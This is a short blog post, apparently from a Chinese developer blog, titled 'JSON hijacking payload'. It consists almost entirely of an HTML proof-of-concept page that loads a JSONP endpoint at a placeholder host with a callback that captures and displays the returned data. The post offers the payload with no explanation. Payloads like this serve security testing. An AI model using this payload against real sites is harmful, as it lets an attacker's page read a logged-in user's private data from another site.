json劫持payload

<html>
<head>jsonp hijacking</head>
<body>
<script>
    function jj(json){
        alert(JSON.stringify(json));
    }
</script>
<script src="https://test/?callback=jj">
</script>
</body>
</html>

 

posted @ 2019-03-26 17:16  huim  阅读(524)  评论(0编辑  收藏  举报